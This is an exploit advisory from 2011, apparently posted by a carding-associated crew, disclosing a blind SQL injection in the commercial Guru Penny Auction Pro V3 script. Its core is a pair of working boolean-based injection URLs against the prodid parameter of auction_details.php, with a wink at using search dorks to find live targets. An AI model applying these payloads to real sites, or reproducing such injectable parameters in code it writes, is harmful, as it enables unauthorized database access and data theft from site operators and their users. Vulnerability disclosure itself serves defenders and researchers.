Guru Penny Auction Pro 3 Blind SQL Injection

` ) ) ) ( ( ( ( ( ) )  
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(  
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())  
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\  
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)  
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /  
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <   
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\  
.WEB.ID  
-----------------------------------------------------------------------  
Guru Penny Auction Pro V3 Blind SQL Injection Vulnerability  
-----------------------------------------------------------------------  
Author : v3n0m  
Site : http://yogyacarderlink.web.id/  
Date : May, 28-2011  
Location : Jakarta, Indonesia  
Time Zone : GMT +7:00  
----------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : Guru Penny Auction Pro V3  
Vendor : http://www.guruscript.com  
Price : $387 USD  
Version : 3.0 Other versions may also be affected  
Google Dork : Use your brain & imagination :)  
  
"NEW"GURU PENNY AUCTION PRO V3 is a powerful, scalable &  
fully-featured application that lets you create the ultimate  
profitable online penny auction website.  
----------------------------------------------------------------  
  
Blind SQLi p0c:  
~~~~~~  
  
http://127.0.0.1/[path]/auction_details.php?prodid=72+AND+SUBSTRING(@@version,1,1)=5 << true  
http://127.0.0.1/[path]/auction_details.php?prodid=72+AND+SUBSTRING(@@version,1,1)=4 << false  
----------------------------------------------------------------  
ALL YOGYACARDERLINK CREW  
---------------------------[EOF]--------------------------------  
  
`